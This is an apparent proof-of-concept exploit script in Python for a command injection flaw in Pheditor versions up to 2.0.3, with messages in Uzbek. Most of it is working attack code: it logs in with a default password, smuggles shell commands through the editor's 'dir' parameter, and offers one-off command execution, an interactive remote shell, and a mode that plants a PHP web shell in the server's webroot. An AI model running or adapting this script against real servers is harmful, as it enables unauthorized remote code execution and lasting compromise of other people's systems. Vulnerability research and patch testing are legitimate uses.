#!/usr/bin/env python3
"""
CVE-2026-48030 - OS Command Injection in Pheditor
Affected: pheditor <= 2.0.3
Fixed:    pheditor >= 2.0.4
Author:   Muslimbek Burxonov
"""

import argparse
import re
import sys
import requests

requests.packages.urllib3.disable_warnings()


BANNER = """
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗  ██████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗ ╚════██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ ╚════██╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝      ██╔╝
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝ ╚════╝

CVE-2026-48030 | OS Command Injection | Pheditor <= 2.0.3
Author: Muslimbek Burxonov
"""


def get_token(session, target):
    resp = session.get(target, verify=False, timeout=10)
    match = re.search(r'token = "([a-f0-9]+)"', resp.text)
    if not match:
        print("[-] Token olinmadi — login muvaffaqiyatsiz")
        sys.exit(1)
    return match.group(1)


def login(session, target, password):
    resp = session.post(
        target,
        data={"pheditor_password": password},
        allow_redirects=True,
        verify=False,
        timeout=10
    )
    if 'token = "' not in resp.text:
        print("[-] Login muvaffaqiyatsiz — parol noto'g'ri")
        sys.exit(1)
    print("[+] Login: OK")


def execute(session, target, token, command):
    injection = f"/tmp; {command} #"
    data = {
        "action": "terminal",
        "token": token,
        "command": "ls",
        "dir": injection
    }
    resp = session.post(target, data=data, verify=False, timeout=15)
    try:
        result = resp.json()
        output = result.get("dir") or result.get("result") or ""
        return output.strip()
    except Exception:
        return ""


def check_vulnerability(session, target, token):
    print("[*] Zaiflik tekshirilmoqda...")
    output = execute(session, target, token, "id")
    if "uid=" in output:
        print(f"[+] ZAIFLIK TASDIQLANDI: {output}")
        return True
    print("[-] Zaiflik topilmadi — patch qo'llangan bo'lishi mumkin")
    return False


def interactive_shell(session, target):
    print("\n[+] Interactive shell — 'exit' yozing chiqish uchun\n")
    while True:
        try:
            cmd = input("pheditor$ ").strip()
            if not cmd:
                continue
            if cmd.lower() == "exit":
                print("[*] Chiqilmoqda...")
                break
            token = get_token(session, target)
            output = execute(session, target, token, cmd)
            print(output if output else "(bo'sh natija)")
        except KeyboardInterrupt:
            print("\n[*] Chiqilmoqda...")
            break


def deploy_webshell(session, target, token, webroot):
    print(f"[*] Webshell joylashtirilmoqda: {webroot}/shell.php")
    shell_code = "<?php system($_GET['c']);?>"
    cmd = f"echo '{shell_code}' > {webroot}/shell.php"
    execute(session, target, token, cmd)

    shell_url = target.rsplit("/", 1)[0] + "/shell.php"
    resp = session.get(f"{shell_url}?c=id", verify=False, timeout=10)
    if "uid=" in resp.text:
        print(f"[+] Webshell muvaffaqiyatli joylashtirildi!")
        print(f"[+] URL: {shell_url}?c=COMMAND")
        print(f"[+] Test: {resp.text.strip()}")
    else:
        print("[-] Webshell joylashtirilmadi")


def main():
    print(BANNER)

    parser = argparse.ArgumentParser(
        description="CVE-2026-48030 PoC — Pheditor OS Command Injection"
    )
    parser.add_argument("--target", required=True,
                        help="Target URL (e.g. http://target/pheditor.php)")
    parser.add_argument("--password", default="admin",
                        help="Pheditor password (default: admin)")
    parser.add_argument("--cmd",
                        help="Bajarish uchun bitta buyruq")
    parser.add_argument("--webshell",
                        help="Webshell uchun webroot yo'li (e.g. /var/www/html)")
    parser.add_argument("--shell", action="store_true",
                        help="Interactive shell oching")
    args = parser.parse_args()

    session = requests.Session()
    session.headers.update({"User-Agent": "Mozilla/5.0"})

    print(f"[*] Target: {args.target}")
    print(f"[*] Parol:  {args.password}\n")

    # Login
    login(session, args.target, args.password)

    # Token
    token = get_token(session, args.target)
    print(f"[+] CSRF Token: {token[:16]}...")

    # Zaiflik tekshirish
    if not check_vulnerability(session, args.target, token):
        sys.exit(1)

    # Rejim tanlash
    if args.cmd:
        token = get_token(session, args.target)
        output = execute(session, args.target, token, args.cmd)
        print(f"\n[+] Natija:\n{output}")

    elif args.webshell:
        token = get_token(session, args.target)
        deploy_webshell(session, args.target, token, args.webshell)

    elif args.shell:
        interactive_shell(session, args.target)

    else:
        print("\n[*] Qo'shimcha flaglar:")
        print("    --cmd 'whoami'           — bitta buyruq")
        print("    --shell                  — interactive shell")
        print("    --webshell /var/www/html — webshell joylashtirish")


if __name__ == "__main__":
    main()